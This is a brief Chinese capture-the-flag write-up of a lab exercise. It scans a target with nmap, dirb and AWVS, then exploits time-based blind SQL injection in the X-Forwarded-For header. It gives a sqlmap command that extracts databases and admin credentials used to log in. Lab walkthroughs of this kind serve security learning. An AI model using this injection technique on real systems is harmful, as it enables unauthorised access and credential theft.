CTF—攻防练习之HTTP—SQL注入(X-forwarded-For)

主机：192.168.32.152

靶机：192.168.32.162

 nmap,dirb扫ip，扫目录

在后台发现一个login，登录界面

然后直接上扫描器AVWS，发现存在X—Forwarded—For类型的时间盲注

 

 那直接sqlmap

sqlmap -u "192.168.32.162"  --headers="X-Forwarded-For:* " --dbs --batch 时间型注入，爆出数据库，表名，字段名，列名,admim和pwd

经过漫长的时间盲注后得到admin，和password可以登录到服务中